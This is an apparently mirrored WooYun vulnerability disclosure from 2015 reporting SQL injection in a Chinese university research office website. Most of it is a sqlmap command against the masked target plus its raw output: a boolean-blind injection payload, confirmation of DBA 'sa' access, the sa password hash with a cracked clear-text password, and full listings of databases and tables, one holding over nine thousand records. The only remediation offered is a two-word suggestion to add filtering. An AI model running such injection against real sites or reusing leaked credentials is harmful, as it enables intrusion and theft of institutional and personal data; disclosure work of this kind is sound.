乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-25: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经主动忽略漏洞,细节向公众公开
浙江工商大学科技处网站存在SQL注入漏洞(DBA权限\sa密码泄露\九千多用户信息泄露)
地址:http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534
$ python sqlmap.py -u "http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534" -p id --technique=B --random-agent --batch --search -C pass
Database: kyc+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.Work | 9401 |Database: kycTable: Work[40 columns]+--------------------+---------------+| Column | Type |+--------------------+---------------+| adjust | decimal || auditDate1 | smalldatetime || auditDate2 | smalldatetime || auditDate3 | smalldatetime || auditId1 | char || auditId2 | char || auditId3 | char || auditMemo1 | nvarchar || auditMemo2 | nvarchar || auditMemo3 | nvarchar || bookWcPoints | decimal || collaboratorWorkId | int || indexPoints | decimal || indexType | nvarchar || inputDate | smalldatetime || inputMemo | nvarchar || issnIsbn | char || issue | nvarchar || issueTitle | nvarchar || kiloWords | smallint || levelid | tinyint || loginName | char || orderPoints | decimal || orderType | nvarchar || pages | smallint || pubHouse | nvarchar || pubMonth | smallint || pubYear | smallint || rankPoints | decimal || rankType | nvarchar || signPoints | decimal || signType | nvarchar || startPage | smallint || status | tinyint || totalPoints | decimal || vol | nvarchar || wcPoints | decimal || wcType | nvarchar || workId | int || workTitle | nvarchar |+--------------------+---------------+
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ActionMethod=view&id=534' AND 1276=1276 AND 'mrHr'='mrHr---web application technology: JSPback-end DBMS: Microsoft SQL Server 2000current user: 'sa'current user is DBA: Truedatabase management system users [3]:[*] BUILTIN\\Administrators[*] sa[*] sa1database management system users password hashes:[*] sa [1]: password hash: 0x01004c5c1806ad4bdd3c901e88cff6c1b7e3d5df5c90b99ae1de6143422c4dbba09a3ba556e19a4a0a1c39546ec1 header: 0x0100 salt: 4c5c1806 mixedcase: ad4bdd3c901e88cff6c1b7e3d5df5c90b99ae1de uppercase: 6143422c4dbba09a3ba556e19a4a0a1c39546ec1 clear-text password: sql[*] sa1 [1]: password hash: 0x01!Database: tempdb+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.syssegments | 3 |+--------------------------------------------+---------+Database: kyc+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.Work | 9401 || dbo.sqlmapoutput | 4352 || dbo.oldwork | 3563 || dbo.Journal_temp | 1824 || dbo.OutlayDetail | 1344 || dbo.Award | 592 || dbo.Outlay | 109 || dbo.news | 81 || dbo.func | 51 || dbo.College | 46 || dbo.sort | 39 || dbo.pointshz | 29 || dbo.结果 | 29 || dbo.AwardTypeObj | 25 || dbo.OrderTypeObj | 22 || dbo.pbcatedt | 21 || dbo.kill_kk | 20 || dbo.PrjSource | 20 || dbo.Tables | 20 || dbo.Journal | 17 || dbo.PrjRank | 17 || dbo.GroupUser | 15 || dbo.WorkMember | 15 || dbo.zlmb_tr | 15 || **.**.**.**s | 14 || dbo.SignTypeObj | 12 || dbo.TypePoints | 11 || dbo.AwardSignTypeObj | 6 || dbo.IndexTypeObj | 6 || dbo.manager | 6 || dbo.PrjAwdRatio | 6 || dbo.stuff | 6 || dbo.BookWcTypeObj | 5 || dbo.glgz | 5 || dbo.download | 4 || dbo.level | 3 || dbo.WcTypeObj | 3 |+--------------------------------------------+---------+Database: kyc22+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.Work | 9471 || dbo.oldwork | 6563 || dbo.ProjectPoints | 3385 || dbo.Journal | 1831 || dbo.Journal_temp | 1824 || dbo.GroupUser | 1629 || dbo.newTable1 | 1545 || dbo.RegUser | 1545 || dbo.OutlayDetail | 1345 || dbo.pointshz | 1295 || dbo.notify | 1246 || dbo.Outlay | 1091 || dbo.Award | 592 || dbo.结果 | 290 || dbo.news | 259 || dbo.Communication | 254 || dbo.TypePoints | 113 || dbo.priv | 82 || dbo.func | 51 || dbo.College | 46 || dbo.Department | 46 || dbo.document | 46 || dbo.sort | 39 || dbo.fff | 38 || dbo.RankTypeObj | 33 || dbo.Tables | 29 || dbo.AwardTypeObj | 25 || dbo.OrderTypeObj | 22 || dbo.pbcatedt | 21 || dbo.kill_kk | 20 || dbo.pbcatfmt | 20 || dbo.PrjSource | 20 || dbo.sere | 20 || dbo.PrjRank | 19 || dbo.WorkMember | 15 || dbo.zlmb_tr | 15 || **.**.**.**s | 14 || dbo.SignTypeObj | 12 || dbo.download | 9 || dbo.kyjhhyh | 9 || dbo.WcTypeObj | 9 || dbo.AwardSignTypeObj | 6 || dbo.D99_Tmp | 6 || dbo.IndexTypeObj | 6 || dbo.manager | 6 || dbo.PrjAwdRatio | 6 || dbo.ProductionType | 6 || dbo.stuff | 6 || dbo.BookWcTypeObj | 5 || dbo.glgz | 5 || dbo.status | 5 || dbo.sysconstraints | 5 || dbo.UserGroup | 5 || dbo.dlmb_tr | 3 || dbo.level | 3 || dbo.syssegments | 3 || dbo.harvest | 2 || dbo.prjlevel | 2 || dbo.project | 2 || dbo.D99_REG | 1 || dbo.depart_z | 1 || dbo.guizu | 1 || dbo.kycxcl | 1 |+--------------------------------------------+---------+Database: pubs+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.sysconstraints | 34 || dbo.titleview | 25 || dbo.authors | 23 || dbo.publishers | 8 || dbo.titles | 8 || dbo.stores | 6 || dbo.discounts | 3 || dbo.pub_info | 3 || dbo.syssegments | 2 || dbo.sales | 1 |+--------------------------------------------+---------+Database: master+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| INFORMATION_SCHEMA.PARAMETERS | 3710 || INFORMATION_SCHEMA.ROUTINES | 1050 || dbo.spt_values | 730 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 400 || INFORMATION_SCHEMA.COLUMNS | 399 || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 302 || INFORMATION_SCHEMA.ROUTINE_COLUMNS | 159 || INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 63 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 39 || INFORMATION_SCHEMA.TABLES | 37 || dbo.spt_datatype_info | 36 || dbo.spt_server_info | 29 || INFORMATION_SCHEMA.VIEWS | 26 || dbo.spt_provider_types | 25 || dbo.spt_datatype_info_ext | 10 || INFORMATION_SCHEMA.SCHEMATA | 8 || dbo.sysconstraints | 3 || dbo.syslogins | 3 || dbo.syssegments | 3 || dbo.MSreplication_options | 2 || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE | 2 || INFORMATION_SCHEMA.KEY_COLUMN_USAGE | 2 || dbo.spt_monitor | 1 || dbo.sysoledbusers | 1 || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE | 1 || INFORMATION_SCHEMA.TABLE_CONSTRAINTS | 1 |+--------------------------------------------+---------+Database: msdb+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.RTblVersions | 324 || dbo.RTblRelColDefs | 320 || dbo.RTblRelshipDefs | 144 || dbo.sysconstraints | 99 || dbo.RTblRelshipProps | 28 || dbo.syscategories | 17 || dbo.RTblTypeLibs | 16 || dbo.backupset | 5 || dbo.RTblRelships | 4 || dbo.syssegments | 3 || dbo.backupmediafamily | 2 || dbo.backupmediaset | 2 || dbo.RTblNamedObj | 2 || dbo.sysjobhistory | 2 || dbo.sysdbmaintplans | 1 || dbo.sysjobs_view | 1 || dbo.sysjobservers | 1 || dbo.systargetservers_view | 1 |+--------------------------------------------+---------+Database: model+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.syssegments | 3 |+--------------------------------------------+---------+Database: Northwind+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.[Quarterly Orders] | 86 || dbo.Products | 77 || dbo.[Alphabetical list of products] | 69 || dbo.[Products by Category] | 69 || dbo.Territories | 53 || dbo.sysconstraints | 43 || dbo.[Products Above Average Price] | 25 || dbo.[Category Sales for 1997] | 8 || dbo.Categories | 8 || dbo.Region | 4 || dbo.syssegments | 3 |+--------------------------------------------+---------+columns LIKE 'pass' were found in the following databases:sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ActionMethod=view&id=534' AND 1276=1276 AND 'mrHr'='mrHr---web application technology: JSPback-end DBMS: Microsoft SQL Server 2000sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ActionMethod=view&id=534' AND 1276=1276 AND 'mrHr'='mrHr---web application technology: JSPback-end DBMS: Microsoft SQL Server 2000available databases [8]:[*] kyc[*] kyc22[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdbsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ActionMethod=view&id=534' AND 1276=1276 AND 'mrHr'='mrHr---web application technology: JSPback-end DBMS: Microsoft SQL Server 2000Database: kycTable: Work[40 columns]+--------------------+---------------+| Column | Type |+--------------------+---------------+| adjust | decimal || auditDate1 | smalldatetime || auditDate2 | smalldatetime || auditDate3 | smalldatetime || auditId1 | char || auditId2 | char || auditId3 | char || auditMemo1 | nvarchar || auditMemo2 | nvarchar || auditMemo3 | nvarchar || bookWcPoints | decimal || collaboratorWorkId | int || indexPoints | decimal || indexType | nvarchar || inputDate | smalldatetime || inputMemo | nvarchar || issnIsbn | char || issue | nvarchar || issueTitle | nvarchar || kiloWords | smallint || levelid | tinyint || loginName | char || orderPoints | decimal || orderType | nvarchar || pages | smallint || pubHouse | nvarchar || pubMonth | smallint || pubYear | smallint || rankPoints | decimal || rankType | nvarchar || signPoints | decimal || signType | nvarchar || startPage | smallint || status | tinyint || totalPoints | decimal || vol | nvarchar || wcPoints | decimal || wcType | nvarchar || workId | int || workTitle | nvarchar |+--------------------+---------------+
增加过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-30 14:40
暂无